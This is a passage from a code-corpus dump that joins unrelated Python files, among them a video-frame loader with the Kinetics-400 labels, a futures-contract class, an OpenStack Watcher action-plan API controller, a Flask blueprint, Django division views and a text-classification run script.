clip_path = os.path.join(directory, line_info[0])
duration = int(line_info[1])
target = int(line_info[2])
item = (clip_path, duration, target)
clips.append(item)
return clips
def _TSN_RGB(self, directory, offsets, new_height, new_width, new_length, is_color, name_pattern):
from ...utils.filesystem import try_import_cv2
cv2 = try_import_cv2()
if is_color:
cv_read_flag = cv2.IMREAD_COLOR
else:
cv_read_flag = cv2.IMREAD_GRAYSCALE
interpolation = cv2.INTER_LINEAR
sampled_list = []
for _, offset in enumerate(offsets):
for length_id in range(1, new_length+1):
frame_name = name_pattern % (length_id + offset)
frame_path = directory + "/" + frame_name
cv_img_origin = cv2.imread(frame_path, cv_read_flag)
if cv_img_origin is None:
raise(RuntimeError("Could not load file %s. Check data path." % (frame_path)))
if new_width > 0 and new_height > 0:
cv_img = cv2.resize(cv_img_origin, (new_width, new_height), interpolation)
else:
cv_img = cv_img_origin
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
sampled_list.append(cv_img)
# the shape of clip_input will be H x W x C, and C = num_segments * new_length * 3
clip_input = np.concatenate(sampled_list, axis=2)
return nd.array(clip_input)
class Kinetics400Attr(object):
def __init__(self):
self.num_class = 400
self.classes = ['abseiling', 'air_drumming', 'answering_questions', 'applauding', 'applying_cream', 'archery',
'arm_wrestling', 'arranging_flowers', 'assembling_computer', 'auctioning', 'baby_waking_up', 'baking_cookies',
'balloon_blowing', 'bandaging', 'barbequing', 'bartending', 'beatboxing', 'bee_keeping', 'belly_dancing',
'bench_pressing', 'bending_back', 'bending_metal', 'biking_through_snow', 'blasting_sand', 'blowing_glass',
'blowing_leaves', 'blowing_nose', 'blowing_out_candles', 'bobsledding', 'bookbinding', 'bouncing_on_trampoline',
'bowling', 'braiding_hair', 'breading_or_breadcrumbing', 'breakdancing', 'brush_painting', 'brushing_hair',
'brushing_teeth', 'building_cabinet', 'building_shed', 'bungee_jumping', 'busking', 'canoeing_or_kayaking',
'capoeira', 'carrying_baby', 'cartwheeling', 'carving_pumpkin', 'catching_fish', 'catching_or_throwing_baseball',
'catching_or_throwing_frisbee', 'catching_or_throwing_softball', 'celebrating', 'changing_oil', 'changing_wheel',
'checking_tires', 'cheerleading', 'chopping_wood', 'clapping', 'clay_pottery_making', 'clean_and_jerk',
'cleaning_floor', 'cleaning_gutters', 'cleaning_pool', 'cleaning_shoes', 'cleaning_toilet', 'cleaning_windows',
'climbing_a_rope', 'climbing_ladder', 'climbing_tree', 'contact_juggling', 'cooking_chicken', 'cooking_egg',
'cooking_on_campfire', 'cooking_sausages', 'counting_money', 'country_line_dancing', 'cracking_neck', 'crawling_baby',
'crossing_river', 'crying', 'curling_hair', 'cutting_nails', 'cutting_pineapple', 'cutting_watermelon',
'dancing_ballet', 'dancing_charleston', 'dancing_gangnam_style', 'dancing_macarena', 'deadlifting',
'decorating_the_christmas_tree', 'digging', 'dining', 'disc_golfing', 'diving_cliff', 'dodgeball', 'doing_aerobics',
'doing_laundry', 'doing_nails', 'drawing', 'dribbling_basketball', 'drinking', 'drinking_beer', 'drinking_shots',
'driving_car', 'driving_tractor', 'drop_kicking', 'drumming_fingers', 'dunking_basketball', 'dying_hair',
'eating_burger', 'eating_cake', 'eating_carrots', 'eating_chips', 'eating_doughnuts', 'eating_hotdog',
'eating_ice_cream', 'eating_spaghetti', 'eating_watermelon', 'egg_hunting', 'exercising_arm',
'exercising_with_an_exercise_ball', 'extinguishing_fire', 'faceplanting', 'feeding_birds', 'feeding_fish',
'feeding_goats', 'filling_eyebrows', 'finger_snapping', 'fixing_hair', 'flipping_pancake', 'flying_kite',
'folding_clothes', 'folding_napkins', 'folding_paper', 'front_raises', 'frying_vegetables', 'garbage_collecting',
'gargling', 'getting_a_haircut', 'getting_a_tattoo', 'giving_or_receiving_award', 'golf_chipping', 'golf_driving',
'golf_putting', 'grinding_meat', 'grooming_dog', 'grooming_horse', 'gymnastics_tumbling', 'hammer_throw',
'headbanging', 'headbutting', 'high_jump', 'high_kick', 'hitting_baseball', 'hockey_stop', 'holding_snake',
'hopscotch', 'hoverboarding', 'hugging', 'hula_hooping', 'hurdling', 'hurling_-sport-', 'ice_climbing', 'ice_fishing',
'ice_skating', 'ironing', 'javelin_throw', 'jetskiing', 'jogging', 'juggling_balls', 'juggling_fire',
'juggling_soccer_ball', 'jumping_into_pool', 'jumpstyle_dancing', 'kicking_field_goal', 'kicking_soccer_ball',
'kissing', 'kitesurfing', 'knitting', 'krumping', 'laughing', 'laying_bricks', 'long_jump', 'lunge', 'making_a_cake',
'making_a_sandwich', 'making_bed', 'making_jewelry', 'making_pizza', 'making_snowman', 'making_sushi', 'making_tea',
'marching', 'massaging_back', 'massaging_feet', 'massaging_legs', "massaging_person's_head", 'milking_cow',
'mopping_floor', 'motorcycling', 'moving_furniture', 'mowing_lawn', 'news_anchoring', 'opening_bottle',
'opening_present', 'paragliding', 'parasailing', 'parkour', 'passing_American_football_-in_game-',
'passing_American_football_-not_in_game-', 'peeling_apples', 'peeling_potatoes', 'petting_animal_-not_cat-',
'petting_cat', 'picking_fruit', 'planting_trees', 'plastering', 'playing_accordion', 'playing_badminton',
'playing_bagpipes', 'playing_basketball', 'playing_bass_guitar', 'playing_cards', 'playing_cello', 'playing_chess',
'playing_clarinet', 'playing_controller', 'playing_cricket', 'playing_cymbals', 'playing_didgeridoo', 'playing_drums',
'playing_flute', 'playing_guitar', 'playing_harmonica', 'playing_harp', 'playing_ice_hockey', 'playing_keyboard',
'playing_kickball', 'playing_monopoly', 'playing_organ', 'playing_paintball', 'playing_piano', 'playing_poker',
'playing_recorder', 'playing_saxophone', 'playing_squash_or_racquetball', 'playing_tennis', 'playing_trombone',
'playing_trumpet', 'playing_ukulele', 'playing_violin', 'playing_volleyball', 'playing_xylophone', 'pole_vault',
'presenting_weather_forecast', 'pull_ups', 'pumping_fist', 'pumping_gas', 'punching_bag', 'punching_person_-boxing-',
'push_up', 'pushing_car', 'pushing_cart', 'pushing_wheelchair', 'reading_book', 'reading_newspaper', 'recording_music',
'riding_a_bike', 'riding_camel', 'riding_elephant', 'riding_mechanical_bull', 'riding_mountain_bike', 'riding_mule',
'riding_or_walking_with_horse', 'riding_scooter', 'riding_unicycle', 'ripping_paper', 'robot_dancing', 'rock_climbing',
'rock_scissors_paper', 'roller_skating', 'running_on_treadmill', 'sailing', 'salsa_dancing', 'sanding_floor',
'scrambling_eggs', 'scuba_diving', 'setting_table', 'shaking_hands', 'shaking_head', 'sharpening_knives',
'sharpening_pencil', 'shaving_head', 'shaving_legs', 'shearing_sheep', 'shining_shoes', 'shooting_basketball',
'shooting_goal_-soccer-', 'shot_put', 'shoveling_snow', 'shredding_paper', 'shuffling_cards', 'side_kick',
'sign_language_interpreting', 'singing', 'situp', 'skateboarding', 'ski_jumping', 'skiing_-not_slalom_or_crosscountry-',
'skiing_crosscountry', 'skiing_slalom', 'skipping_rope', 'skydiving', 'slacklining', 'slapping', 'sled_dog_racing',
'smoking', 'smoking_hookah', 'snatch_weight_lifting', 'sneezing', 'sniffing', 'snorkeling', 'snowboarding', 'snowkiting',
'snowmobiling', 'somersaulting', 'spinning_poi', 'spray_painting', 'spraying', 'springboard_diving', 'squat',
'sticking_tongue_out', 'stomping_grapes', 'stretching_arm', 'stretching_leg', 'strumming_guitar', 'surfing_crowd',
'surfing_water', 'sweeping_floor', 'swimming_backstroke', 'swimming_breast_stroke', 'swimming_butterfly_stroke',
'swing_dancing', 'swinging_legs', 'swinging_on_something', 'sword_fighting', 'tai_chi', 'taking_a_shower', 'tango_dancing',
'tap_dancing', 'tapping_guitar', 'tapping_pen', 'tasting_beer', 'tasting_food', 'testifying', 'texting', 'throwing_axe',
'throwing_ball', 'throwing_discus', 'tickling', 'tobogganing', 'tossing_coin', 'tossing_salad', 'training_dog',
'trapezing', 'trimming_or_shaving_beard', 'trimming_trees', 'triple_jump', 'tying_bow_tie', 'tying_knot_-not_on_a_tie-',
'tying_tie', 'unboxing', 'unloading_truck', 'using_computer', 'using_remote_controller_-not_gaming-', 'using_segway',
'vault', 'waiting_in_line', 'walking_the_dog', 'washing_dishes', 'washing_feet', 'washing_hair', 'washing_hands',
'water_skiing', 'water_sliding', 'watering_plants', 'waxing_back', 'waxing_chest', 'waxing_eyebrows', 'waxing_legs',
'weaving_basket', 'welding', 'whistling', 'windsurfing', 'wrapping_present', 'wrestling', 'writing', 'yawning', 'yoga', 'zumba']
| 2.71875 | 3 |
qf_lib/containers/futures/future_contract.py | webclinic017/qf-lib | 198 | 1164 | # Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from qf_lib.common.tickers.tickers import Ticker
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
class FutureContract(object):
""" Class representing a single future contract.
The FutureContract is a simple class representing one futures contract. The FutureContract objects are used by the
FuturesChain, in order to provide the contracts chaining possibilities. It requires 3 parameters: ticker, which is
the symbol of the specific future contract (e.g. BloombergFutureTicker(“CTZ9 Comdty”)), expiration date of the
contract and a PricesDataFrame, containing dates with price field values.
Parameters
----------
ticker: Ticker
symbol of the future contract
exp_date: datetime
expiration date
data: PricesDataFrame
data frame containing dates with price fields values
"""
def __init__(self, ticker: Ticker, exp_date: datetime, data: PricesDataFrame):
self.ticker = ticker
self.exp_date = exp_date
self.data = data
def __str__(self):
return 'Contract: ticker: {}, expiration date: {}'.format(
self.ticker, self.exp_date)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, FutureContract):
return False
return (self.ticker, self.exp_date, self.data) == (other.ticker, other.exp_date, other.data)
def __hash__(self):
return hash((self.ticker, self.exp_date, self.data))
| 2.4375 | 2 |
watcher/api/controllers/v1/action_plan.py | ajaytikoo/watcher | 64 | 1165 | <reponame>ajaytikoo/watcher
# -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An :ref:`Action Plan <action_plan_definition>` specifies a flow of
:ref:`Actions <action_definition>` that should be executed in order to satisfy
a given :ref:`Goal <goal_definition>`. It also contains an estimated
:ref:`global efficacy <efficacy_definition>` alongside a set of
:ref:`efficacy indicators <efficacy_indicator_definition>`.
An :ref:`Action Plan <action_plan_definition>` is generated by Watcher when an
:ref:`Audit <audit_definition>` is successful which implies that the
:ref:`Strategy <strategy_definition>`
which was used has found a :ref:`Solution <solution_definition>` to achieve the
:ref:`Goal <goal_definition>` of this :ref:`Audit <audit_definition>`.
In the default implementation of Watcher, an action plan is composed of
a list of successive :ref:`Actions <action_definition>` (i.e., a Workflow of
:ref:`Actions <action_definition>` belonging to a unique branch).
However, Watcher provides abstract interfaces for many of its components,
allowing other implementations to generate and handle more complex :ref:`Action
Plan(s) <action_plan_definition>` composed of two types of Action Item(s):
- simple :ref:`Actions <action_definition>`: atomic tasks, which means it
can not be split into smaller tasks or commands from an OpenStack point of
view.
- composite Actions: which are composed of several simple
:ref:`Actions <action_definition>`
ordered in sequential and/or parallel flows.
An :ref:`Action Plan <action_plan_definition>` may be described using
standard workflow model description formats such as
`Business Process Model and Notation 2.0 (BPMN 2.0)
<http://www.omg.org/spec/BPMN/2.0/>`_ or `Unified Modeling Language (UML)
<http://www.uml.org/>`_.
To see the life-cycle and description of
:ref:`Action Plan <action_plan_definition>` states, visit :ref:`the Action Plan
state machine <action_plan_state_machine>`.
"""
import datetime
from http import HTTPStatus
from oslo_log import log
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from watcher._i18n import _
from watcher.api.controllers import base
from watcher.api.controllers import link
from watcher.api.controllers.v1 import collection
from watcher.api.controllers.v1 import efficacy_indicator as efficacyindicator
from watcher.api.controllers.v1 import types
from watcher.api.controllers.v1 import utils as api_utils
from watcher.applier import rpcapi
from watcher.common import exception
from watcher.common import policy
from watcher.common import utils
from watcher import objects
from watcher.objects import action_plan as ap_objects
LOG = log.getLogger(__name__)
def hide_fields_in_newer_versions(obj):
"""This method hides fields that were added in newer API versions.
Certain node fields were introduced at certain API versions.
These fields are only made available when the request's API version
matches or exceeds the versions when these fields were introduced.
"""
pass
class ActionPlanPatchType(types.JsonPatchType):
@staticmethod
def _validate_state(patch):
serialized_patch = {'path': patch.path, 'op': patch.op}
if patch.value is not wtypes.Unset:
serialized_patch['value'] = patch.value
# todo: use state machines to handle state transitions
state_value = patch.value
if state_value and not hasattr(ap_objects.State, state_value):
msg = _("Invalid state: %(state)s")
raise exception.PatchError(
patch=serialized_patch, reason=msg % dict(state=state_value))
@staticmethod
def validate(patch):
if patch.path == "/state":
ActionPlanPatchType._validate_state(patch)
return types.JsonPatchType.validate(patch)
@staticmethod
def internal_attrs():
return types.JsonPatchType.internal_attrs()
@staticmethod
def mandatory_attrs():
return ["audit_id", "state"]
class ActionPlan(base.APIBase):
"""API representation of a action plan.
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
action plan.
"""
_audit_uuid = None
_strategy_uuid = None
_strategy_name = None
_efficacy_indicators = None
def _get_audit_uuid(self):
return self._audit_uuid
def _set_audit_uuid(self, value):
if value == wtypes.Unset:
self._audit_uuid = wtypes.Unset
elif value and self._audit_uuid != value:
try:
audit = objects.Audit.get(pecan.request.context, value)
self._audit_uuid = audit.uuid
self.audit_id = audit.id
except exception.AuditNotFound:
self._audit_uuid = None
def _get_efficacy_indicators(self):
if self._efficacy_indicators is None:
self._set_efficacy_indicators(wtypes.Unset)
return self._efficacy_indicators
def _set_efficacy_indicators(self, value):
efficacy_indicators = []
if value == wtypes.Unset and not self._efficacy_indicators:
try:
_efficacy_indicators = objects.EfficacyIndicator.list(
pecan.request.context,
filters={"action_plan_uuid": self.uuid})
for indicator in _efficacy_indicators:
efficacy_indicator = efficacyindicator.EfficacyIndicator(
context=pecan.request.context,
name=indicator.name,
description=indicator.description,
unit=indicator.unit,
value=float(indicator.value),
)
efficacy_indicators.append(efficacy_indicator.as_dict())
self._efficacy_indicators = efficacy_indicators
except exception.EfficacyIndicatorNotFound as exc:
LOG.exception(exc)
elif value and self._efficacy_indicators != value:
self._efficacy_indicators = value
def _get_strategy(self, value):
if value == wtypes.Unset:
return None
strategy = None
try:
if utils.is_uuid_like(value) or utils.is_int_like(value):
strategy = objects.Strategy.get(
pecan.request.context, value)
else:
strategy = objects.Strategy.get_by_name(
pecan.request.context, value)
except exception.StrategyNotFound:
pass
if strategy:
self.strategy_id = strategy.id
return strategy
def _get_strategy_uuid(self):
return self._strategy_uuid
def _set_strategy_uuid(self, value):
if value and self._strategy_uuid != value:
self._strategy_uuid = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_uuid = strategy.uuid
def _get_strategy_name(self):
return self._strategy_name
def _set_strategy_name(self, value):
if value and self._strategy_name != value:
self._strategy_name = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_name = strategy.name
uuid = wtypes.wsattr(types.uuid, readonly=True)
"""Unique UUID for this action plan"""
audit_uuid = wtypes.wsproperty(types.uuid, _get_audit_uuid,
_set_audit_uuid,
mandatory=True)
"""The UUID of the audit this port belongs to"""
strategy_uuid = wtypes.wsproperty(
wtypes.text, _get_strategy_uuid, _set_strategy_uuid, mandatory=False)
"""Strategy UUID the action plan refers to"""
strategy_name = wtypes.wsproperty(
wtypes.text, _get_strategy_name, _set_strategy_name, mandatory=False)
"""The name of the strategy this action plan refers to"""
efficacy_indicators = wtypes.wsproperty(
types.jsontype, _get_efficacy_indicators, _set_efficacy_indicators,
mandatory=True)
"""The list of efficacy indicators associated to this action plan"""
global_efficacy = wtypes.wsattr(types.jsontype, readonly=True)
"""The global efficacy of this action plan"""
state = wtypes.text
"""This action plan state"""
links = wtypes.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated action links"""
hostname = wtypes.wsattr(wtypes.text, mandatory=False)
"""Hostname the actionplan is running on"""
def __init__(self, **kwargs):
super(ActionPlan, self).__init__()
self.fields = []
fields = list(objects.ActionPlan.fields)
for field in fields:
# Skip fields we do not expose.
if not hasattr(self, field):
continue
self.fields.append(field)
setattr(self, field, kwargs.get(field, wtypes.Unset))
self.fields.append('audit_uuid')
self.fields.append('efficacy_indicators')
setattr(self, 'audit_uuid', kwargs.get('audit_id', wtypes.Unset))
fields.append('strategy_uuid')
setattr(self, 'strategy_uuid', kwargs.get('strategy_id', wtypes.Unset))
fields.append('strategy_name')
setattr(self, 'strategy_name', kwargs.get('strategy_id', wtypes.Unset))
@staticmethod
def _convert_with_links(action_plan, url, expand=True):
if not expand:
action_plan.unset_fields_except(
['uuid', 'state', 'efficacy_indicators', 'global_efficacy',
'updated_at', 'audit_uuid', 'strategy_uuid', 'strategy_name'])
action_plan.links = [
link.Link.make_link(
'self', url,
'action_plans', action_plan.uuid),
link.Link.make_link(
'bookmark', url,
'action_plans', action_plan.uuid,
bookmark=True)]
return action_plan
@classmethod
def convert_with_links(cls, rpc_action_plan, expand=True):
action_plan = ActionPlan(**rpc_action_plan.as_dict())
hide_fields_in_newer_versions(action_plan)
return cls._convert_with_links(action_plan, pecan.request.host_url,
expand)
@classmethod
def sample(cls, expand=True):
sample = cls(uuid='9ef4d84c-41e8-4418-9220-ce55be0436af',
state='ONGOING',
created_at=datetime.datetime.utcnow(),
deleted_at=None,
updated_at=datetime.datetime.utcnow())
sample._audit_uuid = 'abcee106-14d3-4515-b744-5a26885cf6f6'
sample._efficacy_indicators = [{'description': 'Test indicator',
'name': 'test_indicator',
'unit': '%'}]
sample._global_efficacy = {'description': 'Global efficacy',
'name': 'test_global_efficacy',
'unit': '%'}
return cls._convert_with_links(sample, 'http://localhost:9322', expand)
class ActionPlanCollection(collection.Collection):
"""API representation of a collection of action_plans."""
action_plans = [ActionPlan]
"""A list containing action_plans objects"""
def __init__(self, **kwargs):
self._type = 'action_plans'
@staticmethod
def convert_with_links(rpc_action_plans, limit, url=None, expand=False,
**kwargs):
ap_collection = ActionPlanCollection()
ap_collection.action_plans = [ActionPlan.convert_with_links(
p, expand) for p in rpc_action_plans]
ap_collection.next = ap_collection.get_next(limit, url=url, **kwargs)
return ap_collection
@classmethod
def sample(cls):
sample = cls()
sample.action_plans = [ActionPlan.sample(expand=False)]
return sample
class ActionPlansController(rest.RestController):
"""REST controller for Actions."""
def __init__(self):
super(ActionPlansController, self).__init__()
self.applier_client = rpcapi.ApplierAPI()
from_actionsPlans = False
"""A flag to indicate if the requests to this controller are coming
from the top-level resource ActionPlan."""
_custom_actions = {
'start': ['POST'],
'detail': ['GET']
}
def _get_action_plans_collection(self, marker, limit,
sort_key, sort_dir, expand=False,
resource_url=None, audit_uuid=None,
strategy=None):
additional_fields = ['audit_uuid', 'strategy_uuid', 'strategy_name']
api_utils.validate_sort_key(
sort_key, list(objects.ActionPlan.fields) + additional_fields)
limit = api_utils.validate_limit(limit)
api_utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.ActionPlan.get_by_uuid(
pecan.request.context, marker)
filters = {}
if audit_uuid:
filters['audit_uuid'] = audit_uuid
if strategy:
if utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
need_api_sort = api_utils.check_need_api_sort(sort_key,
additional_fields)
sort_db_key = (sort_key if not need_api_sort
else None)
action_plans = objects.ActionPlan.list(
pecan.request.context,
limit,
marker_obj, sort_key=sort_db_key,
sort_dir=sort_dir, filters=filters)
action_plans_collection = ActionPlanCollection.convert_with_links(
action_plans, limit, url=resource_url, expand=expand,
sort_key=sort_key, sort_dir=sort_dir)
if need_api_sort:
api_utils.make_api_sort(action_plans_collection.action_plans,
sort_key, sort_dir)
return action_plans_collection
@wsme_pecan.wsexpose(ActionPlanCollection, types.uuid, int, wtypes.text,
wtypes.text, types.uuid, wtypes.text)
def get_all(self, marker=None, limit=None,
sort_key='id', sort_dir='asc', audit_uuid=None, strategy=None):
"""Retrieve a list of action plans.
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
:param audit_uuid: Optional UUID of an audit, to get only actions
for that audit.
:param strategy: strategy UUID or name to filter by
"""
context = pecan.request.context
policy.enforce(context, 'action_plan:get_all',
action='action_plan:get_all')
return self._get_action_plans_collection(
marker, limit, sort_key, sort_dir,
audit_uuid=audit_uuid, strategy=strategy)
@wsme_pecan.wsexpose(ActionPlanCollection, types.uuid, int, wtypes.text,
wtypes.text, types.uuid, wtypes.text)
def detail(self, marker=None, limit=None,
sort_key='id', sort_dir='asc', audit_uuid=None, strategy=None):
"""Retrieve a list of action_plans with detail.
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
:param audit_uuid: Optional UUID of an audit, to get only actions
for that audit.
:param strategy: strategy UUID or name to filter by
"""
context = pecan.request.context
policy.enforce(context, 'action_plan:detail',
action='action_plan:detail')
# NOTE(lucasagomes): /detail should only work agaist collections
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "action_plans":
raise exception.HTTPNotFound
expand = True
resource_url = '/'.join(['action_plans', 'detail'])
return self._get_action_plans_collection(
marker, limit, sort_key, sort_dir, expand,
resource_url, audit_uuid=audit_uuid, strategy=strategy)
@wsme_pecan.wsexpose(ActionPlan, types.uuid)
def get_one(self, action_plan_uuid):
"""Retrieve information about the given action plan.
:param action_plan_uuid: UUID of a action plan.
"""
if self.from_actionsPlans:
raise exception.OperationNotPermitted
context = pecan.request.context
action_plan = api_utils.get_resource('ActionPlan', action_plan_uuid)
policy.enforce(
context, 'action_plan:get', action_plan, action='action_plan:get')
return ActionPlan.convert_with_links(action_plan)
@wsme_pecan.wsexpose(None, types.uuid, status_code=HTTPStatus.NO_CONTENT)
def delete(self, action_plan_uuid):
"""Delete an action plan.
:param action_plan_uuid: UUID of a action.
"""
context = pecan.request.context
action_plan = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
policy.enforce(context, 'action_plan:delete', action_plan,
action='action_plan:delete')
allowed_states = (ap_objects.State.SUCCEEDED,
ap_objects.State.RECOMMENDED,
ap_objects.State.FAILED,
ap_objects.State.SUPERSEDED,
ap_objects.State.CANCELLED)
if action_plan.state not in allowed_states:
raise exception.DeleteError(
state=action_plan.state)
action_plan.soft_delete()
@wsme.validate(types.uuid, [ActionPlanPatchType])
@wsme_pecan.wsexpose(ActionPlan, types.uuid,
body=[ActionPlanPatchType])
def patch(self, action_plan_uuid, patch):
"""Update an existing action plan.
:param action_plan_uuid: UUID of a action plan.
:param patch: a json PATCH document to apply to this action plan.
"""
if self.from_actionsPlans:
raise exception.OperationNotPermitted
context = pecan.request.context
action_plan_to_update = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
policy.enforce(context, 'action_plan:update', action_plan_to_update,
action='action_plan:update')
try:
action_plan_dict = action_plan_to_update.as_dict()
action_plan = ActionPlan(**api_utils.apply_jsonpatch(
action_plan_dict, patch))
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
launch_action_plan = False
cancel_action_plan = False
# transitions that are allowed via PATCH
allowed_patch_transitions = [
(ap_objects.State.RECOMMENDED,
ap_objects.State.PENDING),
(ap_objects.State.RECOMMENDED,
ap_objects.State.CANCELLED),
(ap_objects.State.ONGOING,
ap_objects.State.CANCELLING),
(ap_objects.State.PENDING,
ap_objects.State.CANCELLED),
]
# todo: improve this in blueprint watcher-api-validation
if hasattr(action_plan, 'state'):
transition = (action_plan_to_update.state, action_plan.state)
if transition not in allowed_patch_transitions:
error_message = _("State transition not allowed: "
"(%(initial_state)s -> %(new_state)s)")
raise exception.PatchError(
patch=patch,
reason=error_message % dict(
initial_state=action_plan_to_update.state,
new_state=action_plan.state))
if action_plan.state == ap_objects.State.PENDING:
launch_action_plan = True
if action_plan.state == ap_objects.State.CANCELLED:
cancel_action_plan = True
# Update only the fields that have changed
for field in objects.ActionPlan.fields:
try:
patch_val = getattr(action_plan, field)
except AttributeError:
# Ignore fields that aren't exposed in the API
continue
if patch_val == wtypes.Unset:
patch_val = None
if action_plan_to_update[field] != patch_val:
action_plan_to_update[field] = patch_val
if (field == 'state' and
patch_val == objects.action_plan.State.PENDING):
launch_action_plan = True
action_plan_to_update.save()
# NOTE: if action plan is cancelled from pending or recommended
# state update action state here only
if cancel_action_plan:
filters = {'action_plan_uuid': action_plan.uuid}
actions = objects.Action.list(pecan.request.context,
filters=filters, eager=True)
for a in actions:
a.state = objects.action.State.CANCELLED
a.save()
if launch_action_plan:
self.applier_client.launch_action_plan(pecan.request.context,
action_plan.uuid)
action_plan_to_update = objects.ActionPlan.get_by_uuid(
pecan.request.context,
action_plan_uuid)
return ActionPlan.convert_with_links(action_plan_to_update)
@wsme_pecan.wsexpose(ActionPlan, types.uuid)
def start(self, action_plan_uuid, **kwargs):
"""Start an action_plan
:param action_plan_uuid: UUID of an action_plan.
"""
action_plan_to_start = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
context = pecan.request.context
policy.enforce(context, 'action_plan:start', action_plan_to_start,
action='action_plan:start')
if action_plan_to_start['state'] != \
objects.action_plan.State.RECOMMENDED:
raise exception.StartError(
state=action_plan_to_start.state)
action_plan_to_start['state'] = objects.action_plan.State.PENDING
action_plan_to_start.save()
self.applier_client.launch_action_plan(pecan.request.context,
action_plan_uuid)
action_plan_to_start = objects.ActionPlan.get_by_uuid(
pecan.request.context, action_plan_uuid)
return ActionPlan.convert_with_links(action_plan_to_start)
| 1.46875 | 1 |
controllers/albums.py | jeonginlee/groove_scheduler | 0 | 1166 | <reponame>jeonginlee/groove_scheduler
from flask import *
albums = Blueprint('albums', __name__, template_folder='templates')
@albums.route('/albums/edit')
def albums_edit_route():
options = {
"edit": True
}
return render_template("albums.html", **options)
@albums.route('/albums')
def albums_route():
options = {
"edit": False
}
return render_template("albums.html", **options) | 2.171875 | 2 |
Incident-Response/Tools/dfirtrack/dfirtrack_main/views/division_views.py | sn0b4ll/Incident-Playbook | 1 | 1167 | <filename>Incident-Response/Tools/dfirtrack/dfirtrack_main/views/division_views.py
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.views.generic.edit import CreateView, UpdateView
from dfirtrack_main.forms import DivisionForm
from dfirtrack_main.logger.default_logger import debug_logger
from dfirtrack_main.models import Division
class DivisionList(LoginRequiredMixin, ListView):
login_url = '/login'
model = Division
template_name = 'dfirtrack_main/division/division_list.html'
context_object_name = 'division_list'
def get_queryset(self):
debug_logger(str(self.request.user), " DIVISION_LIST_ENTERED")
return Division.objects.order_by('division_name')
class DivisionDetail(LoginRequiredMixin, DetailView):
login_url = '/login'
model = Division
template_name = 'dfirtrack_main/division/division_detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
division = self.object
division.logger(str(self.request.user), " DIVISION_DETAIL_ENTERED")
return context
class DivisionCreate(LoginRequiredMixin, CreateView):
login_url = '/login'
model = Division
form_class = DivisionForm
template_name = 'dfirtrack_main/division/division_add.html'
def get(self, request, *args, **kwargs):
form = self.form_class()
debug_logger(str(request.user), " DIVISION_ADD_ENTERED")
return render(request, self.template_name, {'form': form})
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
division = form.save(commit=False)
division.save()
division.logger(str(request.user), " DIVISION_ADD_EXECUTED")
messages.success(request, 'Division added')
return redirect(reverse('division_detail', args=(division.division_id,)))
else:
return render(request, self.template_name, {'form': form})
class DivisionUpdate(LoginRequiredMixin, UpdateView):
login_url = '/login'
model = Division
form_class = DivisionForm
template_name = 'dfirtrack_main/division/division_edit.html'
def get(self, request, *args, **kwargs):
division = self.get_object()
form = self.form_class(instance=division)
division.logger(str(request.user), " DIVISION_EDIT_ENTERED")
return render(request, self.template_name, {'form': form})
def post(self, request, *args, **kwargs):
division = self.get_object()
form = self.form_class(request.POST, instance=division)
if form.is_valid():
division = form.save(commit=False)
division.save()
division.logger(str(request.user), " DIVISION_EDIT_EXECUTED")
messages.success(request, 'Division edited')
return redirect(reverse('division_detail', args=(division.division_id,)))
else:
return render(request, self.template_name, {'form': form})
| 1.953125 | 2 |
run.py | shark803/Torch_serve_example_NLP | 1 | 1168 | # coding: UTF-8
import time
import torch
import numpy as np
from train_eval import train, init_network
from importlib import import_module
import argparse
parser = argparse.ArgumentParser(description='Chinese Text Classification')
parser.add_argument('--model', type=str, required=True, help='choose a model: TextCNN')
parser.add_argument('--embedding', default='pre_trained', type=str, help='random or pre_trained')
parser.add_argument('--word', default=False, type=bool, help='True for word, False for char')
args = parser.parse_args()
if __name__ == '__main__':
dataset = 'THUCNews' # 数据集
# 搜狗新闻:embedding_SougouNews.npz, 腾讯:embedding_Tencent.npz, 随机初始化:random
# embedding = 'random'
model_name = args.model # TextCNN
from utils import build_dataset, build_iterator, get_time_dif
x = import_module('models.' + model_name)
from config import Config
config = Config(dataset)
np.random.seed(1)
